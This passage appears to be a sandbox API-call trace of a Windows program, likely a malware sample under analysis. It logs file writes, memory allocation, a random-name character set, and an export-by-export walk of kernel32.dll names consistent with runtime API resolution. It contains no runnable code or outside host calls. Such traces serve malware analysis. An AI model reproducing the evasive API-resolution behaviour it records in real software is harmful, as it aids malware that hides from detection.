dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.151] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.151] CloseHandle (hObject=0x454) returned 1 [0078.151] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.151] WriteFile (in: hFile=0x450, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0078.152] CloseHandle (hObject=0x0) returned 0 [0078.153] CloseHandle (hObject=0x450) returned 1 [0078.153] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.153] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.154] GetTickCount () returned 0x114c0a1 [0078.154] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.154] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.154] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.154] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.155] lstrlenA (lpString="kernel32.dll") returned 12 [0078.155] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.155] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.155] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.155] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.155] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.155] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.155] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.155] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.155] lstrlenA (lpString="ADDATOMA") returned 8 [0078.155] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.155] lstrlenA (lpString="ADDATOMW") returned 8 [0078.155] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.155] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.155] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.155] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.155] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.155] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.155] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.155] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.155] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.155] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.155] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.155] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.155] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.155] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.155] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.155] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.155] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.155] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.156] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.156] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.156] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.156] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.156] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.156] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.156] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.156] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.156] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.156] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.156] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.156] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.156] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.156] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.156] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.156] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.156] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.156] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.156] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.157] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.157] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.157] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.157] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.157] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.157] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.157] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.157] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.157] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.157] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.157] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.157] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.157] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.157] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.157] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.157] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.157] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.157] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.157] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.158] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.158] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.158] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.158] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.158] lstrlenA (lpString="BEEP") returned 4 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.158] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.158] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.158] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.158] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.158] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.158] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.158] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.158] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.158] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.158] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.158] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.158] lstrlenA (lpString="CANCELIO") returned 8 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.158] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.158] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.159] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.159] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.159] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.159] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.159] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.159] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.159] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.159] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.159] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.159] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.159] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.159] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.159] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.159] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.159] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.159] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.159] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.159] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.159] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.159] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.160] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.160] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.160] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.160] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.160] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.160] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.160] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.160] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.160] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.160] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.160] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.160] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.160] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.160] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.160] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.160] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.160] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.160] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.160] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.161] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.161] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.161] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.161] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.161] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.161] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.161] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.161] lstrlenA (lpString="COPYFILEA") returned 9 [0078.161] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.161] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.161] lstrcpyA (in: 